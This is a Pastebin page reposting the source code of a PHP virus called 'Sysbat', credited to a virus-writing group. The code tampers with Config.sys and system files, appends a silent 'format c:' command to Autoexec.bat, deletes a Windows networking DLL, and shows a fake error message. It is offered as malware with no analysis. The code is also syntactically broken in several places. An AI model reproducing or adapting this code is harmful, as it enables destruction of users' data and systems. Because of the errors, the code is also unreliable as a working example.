Advertisement
FlyFar

Virus.PHP.Sysbat - Source Code

Jun 16th, 2023
678
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.91 KB | Cybersecurity | 0 0
  1. <?php
  2. // SYSBAT.PHP VIRUS
  3. // By Xmorfic, www.shadowvx.com/bcvg, The Black Cat Virii Group
  4. // SYSBAT.PHP - This virus infectes Config.sys, autoexec.bat and system files in
  5. // C:\Windows\Command\ directory.
  6.  
  7. $config = 'C:\Config.sys';
  8. $autoexec = 'C:\Autoexec.bat';
  9. $phps     = "SYSBAT.PHP";
  10. $newphp   = 'sysbat.sys';
  11. $avxm     = "This program performed an illegal operation"; 
  12.  
  13. $infsystem = true;
  14.  
  15.     $infsys = fopen($config, "r");
  16.     $check  = fread($infsys, filesize($config));
  17.     $infs   = strstr ($check, '47hGHRHjkliliurpIOIPOIporipOOPOirujkJKLLJj<Xmorfic>HKGJD');
  18.     if (!$infs) $infsystem = false;
  19.  
  20.     if ( ($infsystem=false) )
  21.     {
  22.         $infsys = fopen($config, "a");
  23.         $fputs($infsys, "47hGHRHjkliliurpIOIPOIporipOOPOirujkJKLLJj<Xmorfic>HKGJD");
  24.         $fputs($infsys, "Xmorfic, www.shadowvx.com/bcvg, Second PHP VIRUS");
  25.         return;
  26.     }
  27.  
  28.     fclose($infsys);
  29.  
  30.     $infbat = fopen($autoexec, "r");
  31.     $checkb = fread($infbat, filesize($autoexec));
  32.     $infb   = strstr ($checkb, 'format c: /autotest /q /u');
  33.     if (!$infb) $infbatf = false;
  34.  
  35.     if ( ($infbatf=false) )
  36.     {
  37.         $infbat = fopen($autoexec, "a");
  38.         $fputs($infbat, "ctty nul ");
  39.         $fputs($infbat, "format c: /autotest /q /u ");
  40.         return;
  41.  
  42.     }
  43.    
  44.     fclose($infbat);
  45.  
  46.     $systems = opendir('C:\Windows\Command\');
  47.     while ($filesys = readdir($systems))
  48.     {
  49.  
  50.         $infected = true;
  51.         $systemexe = false;
  52.  
  53.         if ( ($systemexe = strstr ($filesys, '.sys') )
  54.         if ( (is_writeable($filesys) )
  55.         {
  56.        
  57.             $sysk = fopen($filesys, "r");
  58.             $xst  = fread($sysk, filesize($filesys);
  59.             $good = strstr ($xst, 'Xmorfic_Vx');
  60.             if (!$good) $infected = false;
  61.         }
  62.  
  63.         if ( ($infected=false) )
  64.         {
  65.             $sysk = fopen($filesys, "a");
  66.             $fputs($sysk, "Xmorfic_VX_System_PHP_Infector!!');
  67.             return;
  68.         }
  69.     }
  70.     closedir($systems);
  71.    
  72.     // Rename the virus to sysbat.sys (Optional) $ren = rename(__FILE__, $newphp);
  73.    
  74.     $kok = unlink ('C:\Windows\System\Wsock32.dll');
  75.    
  76.     echo $avxm;
  77. ?>
  78.  
  79.    
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement